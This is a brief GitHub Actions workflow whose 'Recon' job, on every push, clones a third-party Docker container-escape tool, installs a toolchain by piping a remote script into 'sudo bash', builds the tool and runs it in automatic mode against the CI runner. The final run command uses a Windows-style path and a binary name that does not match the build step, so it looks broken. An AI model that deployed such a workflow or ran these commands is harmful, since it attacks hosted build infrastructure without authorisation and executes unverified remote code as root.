name: GHA Test
on: [push]
jobs: 
  Recon: #Each job can run for 6h max
    runs-on: ubuntu-latest
    steps:
      - run: echo "Recon"
      - run: |     
            git clone https://github.com/PercussiveElbow/docker-escape-tool
            cd docker-escape-tool
            curl -fsSL https://crystal-lang.org/install.sh | sudo bash
            shards install
            crystal build  --static src/docker-escape.cr
            .\docker_escape auto




            
       
